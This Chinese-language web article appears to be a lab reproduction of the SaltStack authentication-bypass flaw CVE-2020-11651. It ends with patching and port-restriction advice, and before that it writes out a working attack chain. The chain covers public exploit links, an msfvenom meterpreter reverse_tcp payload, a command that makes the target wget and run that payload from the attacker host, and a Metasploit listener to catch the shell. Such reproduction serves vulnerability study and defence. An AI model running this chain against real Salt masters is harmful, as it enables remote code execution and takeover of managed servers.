您好,登錄后才能下訂單哦!
這期內容當中小編將會給大家帶來有關SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。
SaltStack是基于Python開發的一套C/S架構配置管理工具,是一個服務器基礎架構集中化管理平臺,具備配置管理、遠程執行、監控等功能,基于Python語言實現,結合輕量級消息隊列(ZeroMQ)與Python第三方模塊(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)構建。
通過部署SaltStack,運維人員可以在成千萬臺服務器上做到批量執行命令,根據不同業務進行配置集中化管理、分發文件、采集服務器數據、操作系統基礎及軟件包管理等,SaltStack是運維人員提高工作效率、規范業務配置與操作的利器。
CVE-2020-11651:認證繞過漏洞,攻擊者通過構造惡意請求,繞過Salt Master的驗證邏輯,調用相關未授權函數功能,達到遠程命令執行目的。
SaltStack < 2019.2.4
SaltStack < 3000.2
2019.2.4
3000.2
靶機: 192.168.190.128(ubuntu18.04)(基于Docker搭建漏洞環境)
攻擊機: 192.168.190.129(kali2020.4)
exp:https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP
docker pull vulfocus/saltstack-cve_2020_11651
拉取鏡像的過程可能有點慢,建議配置docker鏡像加速器;
因為我已經拉取過鏡像,所以直接下一步;
docker run -d -p 4506:4506 -p 4505:4505 vulfocus/saltstack-cve_2020_11651
查看docker是否開啟
docker ps
環境啟動成功
1.安裝 python salt模塊
pip3 install salt
查看是否已成功安裝 salt
pip3 list
2.exp使用方法
python3 CVE-2020-11651.py
3.嘗試讀取文件
4.嘗試反彈shell
1.常規方式反彈shell失敗
嘗試很多方法,更換exp,更改反彈端口號,但是都沒有成功~
2.尋找失敗原因
找了很久終于找到一篇文章,無法反彈shell的原因可能是搭建的docker環境中不存在nc命令
測試靶機發現已安裝nc命令
忽然想到我的攻擊機kali是2020.4版本,使用的shell是zsh;而ubuntu使用的shell類型是bash猜測有可能是這個原因導致無法反彈
嘗試修改kali的shell為bash,失敗告終~
3.上傳木馬
按照文章中的方法:
更換exp:https://github.com/dozernz/cve-2020-11651
然后嘗試在攻擊機生成一個木馬,名為test
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.190.129 LPORT=6666 -i 3 -f elf -o test
開啟攻擊機Apache:
/etc/init.d/apache2 start
查看apache是否開啟
service apache2 status
復制木馬到apache網站根目錄
cp test /var/www/html/test
利用exp執行命令進行遠程下載: (報錯是exp腳本問題)
python3 CVE-2020-11651.py 192.168.190.128 master 'wget http://192.168.190.129/test|./test'
添加執行權限
python3 CVE-2020-11651.py 192.168.190.128 master 'chmod +x test |./test'
4.開啟監聽
1.開始msf
msfconsole
2.加載模塊
use exploit/multi/handler
3.設置payload
set payload linux/x64/meterpreter/reverse_tcp
4.設置監聽IP&Port
set lhost 192.168.190.129 set lport 6666
5.執行
exploit
6.遠程執行靶機上的木馬
python3 CVE-2020-11651.py 192.168.190.128 master './test'
7.成功獲得會話
SaltStack官方已發布最新版本修復此漏洞,相關用戶及時更新至安全版本及其以上,升級前做好快照備份。
開啟SaltStack自動更新,實時獲取補丁或升級至安全版本。
禁止將Salt Master默認監聽端口(4505、4506)向公網開放,設置為僅對可信對象開放。
上述就是小編為大家分享的SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。